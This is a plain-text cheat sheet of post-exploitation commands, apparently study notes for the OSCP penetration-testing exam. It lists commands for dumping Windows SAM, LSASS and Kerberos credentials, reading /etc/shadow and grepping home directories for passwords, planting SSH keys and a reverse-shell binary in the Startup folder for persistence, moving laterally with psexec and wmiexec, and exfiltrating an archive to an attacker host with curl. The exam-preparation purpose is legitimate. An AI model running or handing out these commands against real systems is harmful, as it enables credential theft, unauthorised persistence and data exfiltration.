######################################################################
# 09 – POST EXPLOITATION (OSCP 2025)
######################################################################

===============================
# 1. Credential Extraction (Windows)
===============================
# Dump SAM
impacket-secretsdump -sam SAM -system SYSTEM LOCAL

# Dump LSASS (via LSASSY / NetExec)
netexec smb $targetip -u $user -p "$password" -M lsassy

# Token extraction
Rubeus dump /nowrap

===============================
# 2. Credential Extraction (Linux)
===============================
cat /etc/shadow
grep -r "password" /home/*

===============================
# 3. Maintaining Access
===============================
# SSH key injection
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys

# Windows startup persistence
copy rev.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\rev.exe"

===============================
# 4. Network Discovery from Inside
===============================
ipconfig /all
arp -a
route print
netstat -ano

# Linux
ip a
netstat -rn
ss -tunlp

===============================
# 5. Lateral Movement
===============================
# SMB Exec
impacket-psexec $domain/$user:$password@$targetip

# WMI Exec
impacket-wmiexec $domain/$user:$password@$targetip

===============================
# 6. Exfiltration
===============================
tar czf proof.tar.gz /home/user/proof.txt
curl -X POST -F "file=@proof.tar.gz" http://$localip/upload

===============================
# 7. Data Gathering on AD Machines
===============================
net group "Domain Admins" /domain
net accounts
net localgroup administrators

######################################################################
# END OF 09_POST_EXPLOITATION.TXT
######################################################################
